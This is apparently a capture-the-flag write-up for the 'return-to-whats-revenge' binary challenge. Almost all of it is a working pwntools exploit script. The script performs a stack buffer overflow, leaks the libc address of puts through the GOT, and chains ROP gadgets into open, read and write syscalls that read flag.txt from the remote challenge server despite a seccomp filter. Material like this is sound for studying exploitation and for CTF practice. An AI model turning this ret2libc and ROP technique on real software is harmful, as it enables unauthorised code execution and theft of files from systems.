Tags: ret2libc bufferoverflow seccomp orw 

Rating:

Return2Libc + ORW

```CSS
#!/usr/bin/python

from pwn import *

context(os='linux',arch='amd64')
context.loglevel = 'DEBUG'
context(terminal=['tmux','new-window'])

#p = process('./return-to-whats-revenge')
#p = gdb.debug('./return-to-whats-revenge','b main')
p = remote('chal.duc.tf', 30006)
e = ELF('./return-to-whats-revenge')
libc = ELF('./libc.so.6')

JUNK = "A"*56

gets = e.plt['gets']
main = e.symbols['main']
pltputs = e.plt['puts']
gotputs = e.got['puts']
poprdi = e.search(asm('pop rdi; ret')).next()
bss = e.getsectionbyname('.bss')["shaddr"]+1200

payload = JUNK + p64(poprdi) + p64(bss) + p64(gets) + p64(poprdi) + p64(gotputs) + p64(pltputs) + p64(main)

p.recvuntil("to?\n")
p.sendline(payload)
p.sendline("flag.txt")

leak = u64(p.recvline().strip().ljust(8,'\x00'))
print hex(leak)

libcputs = libc.symbols['puts']
lba = leak - libcputs
syscall = libc.search(asm('syscall; ret')).next() + lba
poprsi = libc.search(asm('pop rsi; ret')).next() + lba
poprdx = libc.search(asm('pop rdx; ret')).next() + lba
poprax = libc.search(asm('pop rax; ret')).next() + lba

payload = JUNK
# Open
payload += p64(poprax)
payload += p64(2)
payload += p64(poprdi)
payload += p64(bss)
payload += p64(poprsi)
payload += p64(0)
payload += p64(syscall)
# Read
payload += p64(poprax)
payload += p64(0)
payload += p64(poprdi)
payload += p64(3)
payload += p64(poprsi)
payload += p64(bss)
payload += p64(poprdx)
payload += p64(50)
payload += p64(syscall)
# Write
payload += p64(poprax)
payload += p64(1)
payload += p64(poprdi)
payload += p64(1)
payload += p64(poprdx)
payload += p64(50)
payload += p64(syscall)

p.recvuntil("to?\n")
p.sendline(payload)
print p.recvline()

p.close()
```